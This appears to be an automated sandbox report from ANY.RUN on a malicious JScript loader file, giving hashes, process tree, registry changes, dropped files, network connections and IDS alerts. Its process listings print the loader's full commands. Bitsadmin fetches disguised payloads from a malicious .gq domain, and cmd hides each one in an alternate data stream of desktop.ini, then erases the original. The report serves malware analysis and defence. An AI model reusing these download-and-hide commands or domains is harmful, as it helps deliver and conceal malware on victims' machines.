File name:

bmd7i29.JS

Full analysis: https://app.any.run/tasks/ba44468c-a9ba-4a59-8305-1ef465c945b9
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 21, 2019, 16:41:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

12E8BA05EFFEA4B55613C16B1439986F

SHA1:

BA1B7B7BB7C4E028C0F392C1EF19B58569DBAC7B

SHA256:

2C7FA3A8BCC108185DA9F9CB9C4218578FA30CF03CA9A8FEA3379CB89374FB77

SSDEEP:

3:YYGRacVpKjnAMHW6MdMI5sF:5rkpKjWdDw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 1412)
    • Changes settings of System certificates

      • WScript.exe (PID: 1412)
  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 1412)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 1412)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 1412)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.bs/bin | PrintFox (C64) bitmap (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
12
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1412"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\bmd7i29.JS"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
388"C:\Windows\System32\bitsadmin.exe" /transfer 15302 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvta.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvta.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147954557
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2200"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvta.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3324"C:\Windows\System32\bitsadmin.exe" /transfer 75668 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtb.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtb.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2428"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3788"C:\Windows\System32\bitsadmin.exe" /transfer 75635 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtc.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtc.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2496"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2748"C:\Windows\System32\bitsadmin.exe" /transfer 58255 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdwwn.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gifC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2928"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gif"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3540"C:\Windows\System32\bitsadmin.exe" /transfer 23221 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdx.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdx.gifC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
Total events
179
Read events
143
Write events
35
Delete events
1

Modification events

(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1412) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
0
Suspicious files
4
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
1412WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@00rr32jwi949ikrfm77[1].txttext
MD5:388CC579231FB9A55E1F7F5A7ECCA726
SHA256:76D1AC39A8C631633581D2CFCB6364C61881F686F32BAC230BD99CC954566F25
2496cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpgbinary
MD5:22BF214121CFB0107CD5642995B62AE2
SHA256:6A75F5C9D9A05025A5BBFBB3F328AA1B533B8F263E081FAAE6AF5621EE773164
2428cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpgbinary
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D
SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC
2928cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gifbinary
MD5:5B1B26B50C386467713C19DFADB6E5D7
SHA256:F7145CD84BBB76FE5AEC655680781E3000B56343091D2313D205D1DBA798F49D
3332cmd.exeC:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdx.gifbinary
MD5:420CA9F3B004FB712BB65FCEF471E528
SHA256:963B620478D180D7CFB7951D997D8FE55F73BB8C04ECA7CA5944E1D20B0271F5
1412WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\wwa5tur9iae3_00rr32jwi949ikrfm77_ml[1].txtxml
MD5:64922403CB5BA44BCA4AA2F972A8A166
SHA256:957EE6033CE0E9227C023014EE13AB4AC0D184A0B64DCB8398531291EC20A7B8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
3
Threats
4

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1412
WScript.exe
104.18.37.173:443
wwa5tur9iae3.00rr32jwi949ikrfm77.ml
Cloudflare Inc
US
suspicious
104.28.21.40:443
t3eiyui93at8.admi2939vcu94.gq
Cloudflare Inc
US
malicious

DNS requests

Domain
IP
Reputation
wwa5tur9iae3.00rr32jwi949ikrfm77.ml
  • 104.18.37.173
  • 104.18.36.173
suspicious
t3eiyui93at8.admi2939vcu94.gq
  • 104.28.21.40
  • 104.28.20.40
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ml Domain
Potentially Bad Traffic
ET INFO Suspicious Domain (*.ml) in TLS SNI
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .gq Domain
Potentially Bad Traffic
ET INFO Suspicious Domain (*.gq) in TLS SNI
No debug info